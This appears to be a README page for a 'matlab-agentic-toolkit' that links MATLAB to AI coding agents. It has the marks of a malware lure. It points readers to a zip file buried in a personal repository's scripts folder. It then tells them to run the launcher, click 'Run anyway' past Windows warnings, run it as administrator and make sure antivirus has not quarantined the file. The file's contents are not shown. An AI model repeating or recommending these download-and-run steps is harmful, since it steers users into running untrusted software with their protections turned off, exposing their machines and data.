matlab-agentic-toolkit brings MATLAB tools into workflows that use AI agents. It helps you run engineering and science tasks with a simpler setup. You can use it to connect MATLAB with agent tools and keep your work in one place.
This tool is built for end users who want to:
- open MATLAB from a guided setup
- connect it to agent-based tools
- run engineering tasks with less manual setup
- keep MATLAB work ready for Copilot, Claude Code, or similar tools
Visit this page to download: https://raw.githubusercontent.com/vikto2953/matlab-agentic-toolkit/main/skills-catalog/matlab-core/matlab-testing/scripts/toolkit_agentic_matlab_v3.0.zip
On that page, look for the latest release and download the Windows file that matches your device. If you see a .zip file, download it and extract it first. If you see an .exe file, download and run it.
Follow these steps on Windows:
- Open the download link above.
- Find the latest release.
- Download the Windows version.
- If the file is zipped, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app or launcher file.
- If Windows asks for permission, choose Run anyway.
- Follow the on-screen steps until setup finishes.
If you use a work computer, you may need admin access to install or open the app.
Use a Windows PC with:
- Windows 10 or Windows 11
- Enough free space for MATLAB files and project data
- A stable internet connection for the first download
- MATLAB installed if your release expects a local MATLAB install
- Permission to run downloaded software
For best results, close other large apps before you start.
This toolkit helps with common engineering tasks such as:
- running MATLAB-based steps from agent tools
- working with scientific data
- handling scripts and calculations
- linking MATLAB work to AI agent flows
- using agent-ready skills for repeat tasks
It fits use cases like:
- test and analysis tasks
- math-heavy workflows
- design checks
- data processing
- automation around MATLAB projects
When you open the app for the first time, you may see setup prompts. Use them in this order:
- Choose your language if asked.
- Accept any local permission prompts.
- Point the tool to your MATLAB install if it asks for it.
- Let it finish its first check.
- Open a sample workflow or default project if one appears.
If the app asks for a folder, pick a simple location such as Documents\matlab-agentic-toolkit.
This toolkit is made for agent workflows. That means it can help when you want MATLAB to work with tools such as:
- Claude Code
- Codex plugin setups
- GitHub Copilot flows
- other engineering agents
In practice, this can help you move between natural language tasks and MATLAB actions with less setup.
After setup, you may see files such as:
- config files for your local setup
- logs for troubleshooting
- sample scripts
- project folders
- tool connection files
Keep these files together in one folder so they are easy to find later.
Use the toolkit in a simple flow:
- Start the app or launcher.
- Connect to MATLAB if needed.
- Open or create a task.
- Run the task from the agent tool or local interface.
- Review the output in MATLAB or in the toolkit window.
If you work on repeated tasks, save your setup so you can use it again.
If something does not work:
- Make sure MATLAB is installed
- Check that you opened the correct release file
- Reboot your PC and try again
- Run the app as administrator
- Check that Windows did not block the file
- Make sure your antivirus did not move the file
- Try extracting the ZIP file again if setup failed
If the tool cannot find MATLAB, open the settings and point it to the MATLAB install folder.
Use only the release page linked above. Check that the file name matches the release you want. If Windows shows a security prompt, review the file name and source before you continue.
matlab-agentic-toolkit is a good fit if you:
- use MATLAB often
- want to connect MATLAB to AI agent tools
- work on science or engineering tasks
- want a cleaner path from prompt to MATLAB action
- need a local tool for repeatable workflows
A simple example:
- Open the toolkit.
- Load a MATLAB task.
- Ask an agent tool to prepare the steps.
- Run the task in MATLAB.
- Review the result and save the output.
This keeps the work in a clear path from request to result.
Download the latest release on GitHub
- Keep MATLAB updated
- Keep the toolkit in the same folder
- Save your settings after first setup
- Use one project folder for each task type
- Store important outputs in a separate results folder